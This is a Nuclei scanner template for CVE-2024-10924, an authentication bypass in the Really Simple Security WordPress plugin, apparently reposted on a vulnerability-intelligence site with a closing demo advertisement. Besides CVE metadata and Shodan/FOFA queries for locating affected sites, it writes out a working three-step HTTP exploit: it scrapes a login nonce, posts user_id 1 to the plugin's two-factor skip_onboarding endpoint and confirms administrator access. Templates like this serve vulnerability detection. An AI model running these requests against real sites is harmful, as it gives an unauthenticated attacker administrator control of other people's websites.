Really Simple Security < 9.1.2 - Authentication Bypass in WordPres
id: CVE-2024-10924
info:
name: Really Simple Security < 9.1.2 - Authentication Bypass
author: yaser_s
severity: critical
description: |
The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
remediation: Fixed in 9.1.2
reference:
- https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L277
- https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L278
- https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L67
- https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
- https://wpscan.com/vulnerability/8e1f4374-2e41-4c27-80d4-db172015c6be/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5d05ad-1a7a-43d2-bbbf-597e975446be?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-10924
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-10924
cwe-id: CWE-288,CWE-306
epss-score: 0.00101
epss-percentile: 0.4287
cpe: cpe:2.3:a:really-simple-plugins:really_simple_security:*:*:*:*:-:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: really-simple-plugins
product: really_simple_security
framework: wordpress
shodan-query: html:"/wp-content/plugins/really-simple-ssl"
fofa-query: body="/wp-content/plugins/really-simple-ssl"
tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: nonce
part: body_1
group: 1
regex:
- '"nonce":"([a-z0-9]+)"\}'
internal: true
- raw:
- |
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"user_id": 1,
"login_nonce": "{{nonce}}",
"redirect_to": "/wp-admin/"
}
matchers:
- type: word
part: body
words:
- '"redirect_to":"\/wp-admin\/"'
internal: true
- raw:
- |
GET /wp-admin/profile.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Personal Options'
- type: word
part: content_type
words:
- 'text/html'
# digest: 490a0046304402204abade2aba55b6eea42a22ccf1591c5d83ea31d23f9f492ab7347d8bba93aba00220193ab92d79c45b7af0695a5f7e846ac7ea1183dce997bc97b0647b1382c3aa8a:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo